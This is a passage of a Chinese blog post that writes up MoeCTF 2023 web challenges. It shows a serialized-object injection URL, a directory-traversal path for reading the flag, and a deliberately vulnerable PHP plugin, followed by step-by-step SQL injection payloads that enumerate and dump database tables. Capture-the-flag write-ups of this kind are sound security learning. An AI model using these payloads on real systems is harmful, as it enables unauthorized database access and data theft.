<p><a target="_blank" rel="noopener" href="http://localhost:1209/?chant=di_jiu_qiangdi_shi_san_qiangdi_shi_san_qiangdi_shi_san_qiang%22;s:11:%22Spear_Owner%22;s:6:%22MaoLei%22;%7D">http://localhost:1209/?chant=di_jiu_qiangdi_shi_san_qiangdi_shi_san_qiangdi_shi_san_qiang&quot;;s:11:&quot;Spear_Owner&quot;;s:6:&quot;MaoLei&quot;;}</a></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/6deaf9c5-image.png" alt="image.png"></p>
<p>得到flag</p>
<h1 id="moe图床-1"><a href="#moe图床-1" class="headerlink" title="moe图床"></a>moe图床</h1><p>这一题一开始尝试了很多种类,已知没有确定他的考点到底是什么,就算上传了文件后缀名为.php或者.htaccess文件,也都会被解析为图片,之后发现了要有文件头GIF89a,又发现了finfo_file()</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/13ccca1c-image.png" alt="image.png"></p>
<p>finfo_file():不根据扩展名判断文件类型</p>
<p>最终又去仔细研究了抓包的请求,确定是multipart&#x2F;form-data</p>
<p>行吧,又错了,应该是路径上传路径的问题</p>
<p>抓狂,前面全错的,洗吧</p>
<p>上传了文件之后,会跳跳转到</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/953426e9-image.png" alt="image.png"></p>
<p>在这个地方进行目录遍历,但是在页面上是显示不出来的,我们需要借助burp,在?name&#x3D;..&#x2F;..&#x2F;..&#x2F;flag 时有回显了</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/46801858-image.png" alt="image.png"></p>
<p>然后就是md5若比较绕过即可</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/7b1c0456-image.png" alt="image.png"></p>
<h1 id="signin"><a href="#signin" class="headerlink" title="signin"></a>signin</h1><p>最后一题不会,大概知道涉及jsfuck代码混淆,哈希,加密解密之类的</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/60df0f4b-image.png" alt="image.png"></p>
<p>这个是混淆解密后的东西,我感觉是找对了</p>
<table>
<thead>
<tr>
<th>hashlib.md5(“byte”)</th>
<th>计算“byte”的md5值，并返回一个对象</th>
</tr>
</thead>
</table>
<h2 id="MD5加盐"><a href="#MD5加盐" class="headerlink" title="MD5加盐"></a>MD5加盐</h2><p>Md5+盐值加密，简单来说就是通过MD5加密方式把密码，通过某些特定的秘钥值【即：盐】进行加密、生成加密后的字符串。</p>
<h1 id="出去旅游的心海"><a href="#出去旅游的心海" class="headerlink" title="出去旅游的心海"></a>出去旅游的心海</h1><h2 id="查找的知识点"><a href="#查找的知识点" class="headerlink" title="查找的知识点"></a>查找的知识点</h2><ul>
<li>require_once:在脚本执行期间包含并运行指定文件(通俗一点，括号内的文件会执行一遍)。</li>
<li>mysqli_connect_errno() 函数返回上一次连接错误的错误代码。</li>
<li>mysqli_query() 函数执行某个针对数据库的查询。</li>
</ul>
<p>mysqli_query(<em>connection,query,resultmode</em>)<em>;</em></p>
<table>
<thead>
<tr>
<th><em>connection</em></th>
<th>必需。规定要使用的 MySQL 连接。</th>
</tr>
</thead>
<tbody><tr>
<td><em>query</em></td>
<td>必需，规定查询字符串。</td>
</tr>
<tr>
<td><em>resultmode</em></td>
<td>可选。一个常量。可以是下列值中的任意一个：MYSQLI_USE_RESULT（如果需要检索大量数据，请使用这个）MYSQLI_STORE_RESULT（默认）</td>
</tr>
</tbody></table>
<p>所以这一题的突破口就在$query</p>
<h2 id="解题过程"><a href="#解题过程" class="headerlink" title="解题过程"></a>解题过程</h2><p>打开网页,f12,用网页抓包</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/c8a38db6-image.png" alt="image.png"></p>
<p>看到php后缀名的页面,打开</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/36ae7ab8-image.png" alt="image.png">输入内容跳转</p>
<p>之后随意输入内容查询</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/a612469b-image.png" alt="image.png"></p>
<p>跳转到php网页得到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">Plugin Name: Visitor auto recorder</span></span><br><span class="line"><span class="comment">Description: Automatically record visitor&#x27;s identification, still in development, do not use in industry environment!</span></span><br><span class="line"><span class="comment">Author: KoKoMi</span></span><br><span class="line"><span class="comment">  Still in development! :)</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 不许偷看！这些代码我还在调试呢！</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 加载数据库配置，暂时用硬编码绝对路径</span></span><br><span class="line"><span class="keyword">require_once</span>(<span class="string">&#x27;/var/www/html/wordpress/&#x27;</span> . <span class="string">&#x27;wp-config.php&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$db_user</span> = DB_USER; <span class="comment">// 数据库用户名</span></span><br><span class="line"><span class="variable">$db_password</span> = DB_PASSWORD; <span class="comment">// 数据库密码</span></span><br><span class="line"><span class="variable">$db_name</span> = DB_NAME; <span class="comment">// 数据库名称</span></span><br><span class="line"><span class="variable">$db_host</span> = DB_HOST; <span class="comment">// 数据库主机</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 我记得可以用wp提供的global $wpdb来操作数据库，等旅游回来再研究一下</span></span><br><span class="line"><span class="comment">// 这些是临时的代码</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$ip</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;ip&#x27;</span>];</span><br><span class="line"><span class="variable">$user_agent</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;user_agent&#x27;</span>];</span><br><span class="line"><span class="variable">$time</span> = <span class="title function_ invoke__">stripslashes</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;time&#x27;</span>]);</span><br><span class="line"></span><br><span class="line"><span class="variable">$mysqli</span> = <span class="keyword">new</span> <span class="title function_ invoke__">mysqli</span>(<span class="variable">$db_host</span>, <span class="variable">$db_user</span>, <span class="variable">$db_password</span>, <span class="variable">$db_name</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 检查连接是否成功</span></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$mysqli</span>-&gt;connect_errno) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;数据库连接失败: &#x27;</span> . <span class="variable">$mysqli</span>-&gt;connect_error;</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$query</span> = <span class="string">&quot;INSERT INTO visitor_records (ip, user_agent, time) VALUES (&#x27;<span class="subst">$ip</span>&#x27;, &#x27;<span class="subst">$user_agent</span>&#x27;, <span class="subst">$time</span>)&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 执行插入</span></span><br><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$mysqli</span>, <span class="variable">$query</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 检查插入是否成功</span></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$result</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;数据插入成功&#x27;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;数据插入失败: &#x27;</span> . <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$mysqli</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 关闭数据库连接</span></span><br><span class="line"><span class="title function_ invoke__">mysqli_close</span>(<span class="variable">$mysqli</span>);</span><br></pre></td></tr></table></figure>

<p>被误导去学习的知识: WordPress提供了一个类的操作数据库存的<strong>全局变量叫$wpdb</strong>，通过这个全局变量来与WordPress数据库进行关联</p>
<p>真正就是代码审计而已</p>
<p><code>$mysqli = new mysqli($db_host, $db_user, $db_password, $db_name);</code>,这串代码就是创建一个数据库,数据库的基本信息都在代码里</p>
<p>根据查到的mysqli_query的相关知识,我们可以知道,我们的注入点就是在 $query,而 $query又有三个参数,我们选择time变量来进行注入,因为其他两个变量都由单引号包裹,</p>
<p>之后就是基本的sql注入步骤</p>
<p>查库名</p>
<p><code>time=(database())&amp;ip=1&amp;user_agent=1</code></p>
<p>查表名</p>
<p><code>time=(select group_concat(table_name) from information_schema.tables where table_schema=&#39;wordpress&#39;)&amp;ip=1&amp;user_agent=1</code></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/154b8c66-image.png" alt="image.png"></p>
<p>直接查看第一个表,因为有题目的关键字</p>
<p>查字段</p>
<p><code>time=(select group_concat(column_name) from information_schema.columns where table_name=&#39;secret_of_kokomi&#39;)&amp;ip=1&amp;user_agent=1</code></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/a05f48d0-image.png" alt="image.png"></p>
<p>获取字段信息</p>
<p><code>time=(select group_concat(content) from secret_of_kokomi)&amp;ip=1&amp;user_agent=1</code></p>
<p>得到flag</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/42fc545a-image.png" alt="image.png"></p>
<h1 id="Basic运行代码那几题"><a href="#Basic运行代码那几题" class="headerlink" title="Basic运行代码那几题"></a>Basic运行代码那几题</h1><p>前面没什么好讲的,就记录一下新学到的关于cmd的知识</p>
<p>在这一题中,打开cmd转到可执行文件所在的目录后,如果使用start命令,依旧是会闪退的,正确操作如下</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/ec782c08-image.png" alt="image.png"></p>
<hr>
<p>来源: <a target="_blank" rel="noopener" href="https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/zgawx65d2gbn9zo0">https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/zgawx65d2gbn9zo0</a><br>语雀文档ID: 137185785</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/Writeup/" rel="tag"># Writeup</a>
              <a href="/tags/MoeCTF/" rel="tag"># MoeCTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/09/16/11-NewstarCTF/" rel="prev" title="NewstarCTF">
      <i class="fa fa-chevron-left"></i> NewstarCTF
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#MoeCTF-2023wp"><span class="nav-number">1.</span> <span class="nav-text">MoeCTF 2023wp</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#http"><span class="nav-number">2.</span> <span class="nav-text">http</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web%E5%85%A5%E9%97%A8%E6%8C%87%E5%8C%97"><span class="nav-number">3.</span> <span class="nav-text">web入门指北</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BD%BC%E5%B2%B8%E7%9A%84flag"><span class="nav-number">4.</span> <span class="nav-text">彼岸的flag</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#cookie"><span class="nav-number">5.</span> <span class="nav-text">cookie</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#gas-gas-gas"><span class="nav-number">6.</span> <span class="nav-text">gas!gas!gas!</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#moe%E5%9B%BE%E5%BA%8A"><span class="nav-number">7.</span> <span class="nav-text">moe图床</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%86%E8%A7%A3%E4%BD%A0%E7%9A%84%E5%BA%A7%E9%A9%BE"><span class="nav-number">8.</span> <span class="nav-text">了解你的座驾</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%A4%A7%E6%B5%B7%E6%8D%9E%E9%92%88"><span class="nav-number">9.</span> <span class="nav-text">大海捞针</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%A4%BA%E5%91%BD%E5%8D%81%E4%B8%89%E6%9E%AA"><span class="nav-number">10.</span> <span class="nav-text">夺命十三枪</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#moe%E5%9B%BE%E5%BA%8A-1"><span class="nav-number">11.</span> <span class="nav-text">moe图床</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#signin"><span class="nav-number">12.</span> <span class="nav-text">signin</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#MD5%E5%8A%A0%E7%9B%90"><span class="nav-number">12.1.</span> <span class="nav-text">MD5加盐</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%87%BA%E5%8E%BB%E6%97%85%E6%B8%B8%E7%9A%84%E5%BF%83%E6%B5%B7"><span class="nav-number">13.</span> <span class="nav-text">出去旅游的心海</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E6%89%BE%E7%9A%84%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="nav-number">13.1.</span> <span class="nav-text">查找的知识点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B"><span class="nav-number">13.2.</span> <span class="nav-text">解题过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Basic%E8%BF%90%E8%A1%8C%E4%BB%A3%E7%A0%81%E9%82%A3%E5%87%A0%E9%A2%98"><span class="nav-number">14.</span> <span class="nav-text">Basic运行代码那几题</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="谷氨酸棒状杆菌"
      src="https://ice.frostsky.com/2024/03/16/1776051b6463e644bf0eb40aed808727.md.jpeg">
  <p class="site-author-name" itemprop="name">谷氨酸棒状杆菌</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">64</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">94</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Glut4micum" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Glut4micum" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">谷氨酸棒状杆菌</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div> -->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总访客量 fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总阅读量 fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<div class="site-bg-carousel" id="siteBgCarousel">
  <div class="bg-slide active" style="background-image: url('/images/background/bg-1.jpg');"></div>
  <div class="bg-slide" style="background-image: url('/images/background/bg-2.jpg');"></div>
  <div class="bg-slide" style="background-image: url('/images/background/bg-3.jpg');"></div>
</div>
<div class="site-bg-mask"></div>
<canvas id="particles-canvas"></canvas>

<script>
(function () {
  // ========== 背景轮播 ==========
  var slides = document.querySelectorAll('#siteBgCarousel .bg-slide');
  var current = 0;
  var INTERVAL = 6000; // 6 秒切换
  if (slides.length > 1) {
    setInterval(function () {
      slides[current].classList.remove('active');
      current = (current + 1) % slides.length;
      slides[current].classList.add('active');
    }, INTERVAL);
  }

  // ========== Canvas 连线粒子 ==========
  var canvas = document.getElementById('particles-canvas');
  var ctx = canvas.getContext('2d');
  var particles = [];
  var mouse = { x: null, y: null };
  var COUNT = 70; // 粒子数量
  var LINK_DIST = 140; // 连线距离

  function resize() {
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;
  }
  resize();
  window.addEventListener('resize', resize);

  function random(min, max) { return Math.random() * (max - min) + min; }

  function createParticles() {
    particles = [];
    for (var i = 0; i < COUNT; i++) {
      particles.push({
        x: Math.random() * canvas.width,
        y: Math.random() * canvas.height,
        vx: random(-0.5, 0.5),
        vy: random(-0.5, 0.5),
        r: random(1, 2.5)
      });
    }
  }
  createParticles();

  window.addEventListener('mousemove', function (e) {
    mouse.x = e.clientX;
    mouse.y = e.clientY;
  });
  window.addEventListener('mouseout', function () {
    mouse.x = null;
    mouse.y = null;
  });

  function draw() {
    ctx.clearRect(0, 0, canvas.width, canvas.height);
    var i, j, dx, dy, dist, alpha;
    // 连线
    for (i = 0; i < particles.length; i++) {
      for (j = i + 1; j < particles.length; j++) {
        dx = particles[i].x - particles[j].x;
        dy = particles[i].y - particles[j].y;
        dist = Math.sqrt(dx * dx + dy * dy);
        if (dist < LINK_DIST) {
          alpha = 1 - dist / LINK_DIST;
          ctx.strokeStyle = 'rgba(120, 200, 255, ' + (alpha * 0.5).toFixed(3) + ')';
          ctx.lineWidth = 1;
          ctx.beginPath();
          ctx.moveTo(particles[i].x, particles[i].y);
          ctx.lineTo(particles[j].x, particles[j].y);
          ctx.stroke();
        }
      }
    }
    // 与鼠标连线
    if (mouse.x !== null) {
      for (i = 0; i < particles.length; i++) {
        dx = particles[i].x - mouse.x;
        dy = particles[i].y - mouse.y;
        dist = Math.sqrt(dx * dx + dy * dy);
        if (dist < LINK_DIST * 1.2) {
          alpha = 1 - dist / (LINK_DIST * 1.2);
          ctx.strokeStyle = 'rgba(255, 255, 255, ' + (alpha * 0.4).toFixed(3) + ')';
          ctx.lineWidth = 1;
          ctx.beginPath();
          ctx.moveTo(particles[i].x, particles[i].y);
          ctx.lineTo(mouse.x, mouse.y);
          ctx.stroke();
        }
      }
    }
    // 粒子
    for (i = 0; i < particles.length; i++) {
      var p = particles[i];
      p.x += p.vx;
      p.y += p.vy;
      if (p.x < 0 || p.x > canvas.width) p.vx *= -1;
      if (p.y < 0 || p.y > canvas.height) p.vy *= -1;
      ctx.beginPath();
      ctx.arc(p.x, p.y, p.r, 0, Math.PI * 2);
      ctx.fillStyle = 'rgba(140, 210, 255, 0.85)';
      ctx.fill();
    }
    requestAnimationFrame(draw);
  }
  draw();
})();
</script>
</body>
</html>
